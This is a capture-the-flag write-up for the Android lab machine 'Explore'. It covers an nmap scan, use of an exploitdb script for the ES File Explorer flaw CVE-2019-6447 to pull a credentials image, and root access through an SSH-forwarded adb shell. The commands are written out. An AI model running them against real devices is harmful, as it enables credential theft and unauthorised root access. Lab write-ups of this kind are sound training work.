Explore

Personal Rating: Easy

Enumeration

Starting with an nmap scan, some very interesting results can be seen:

sudo nmap -Pn -sV -p- 10.10.10.247
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
43705/tcp open     unknown
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
  • http://10.10.10.247:59777/ #Forbidden: No dirlisting

ES File Explorer Exploit

The machine seems to be an Android device. Further investigating the ES File explorer turns out to be promising. I found an exploit script on exploitdb:

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================
python3 ES-File-exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

The shell was executed as 'u0_a76', but the image contained the credentials for the user kristi.

ADB Debug Shell

For the root I had some help from a friend who is more proficient in android hacking.

I started an ssh shell from my machine and used adb to start a debug shell:

ssh kristi@<TARGETIP> -p 2222 -L 5555:localhost:5555
adb devices
emulator-5554 device
adb shell

The debug shell was running with root permissions.

This is unusual 'in the wild' as adb debugging would have to be activated on the device, which is uncommon and not default.

Last updated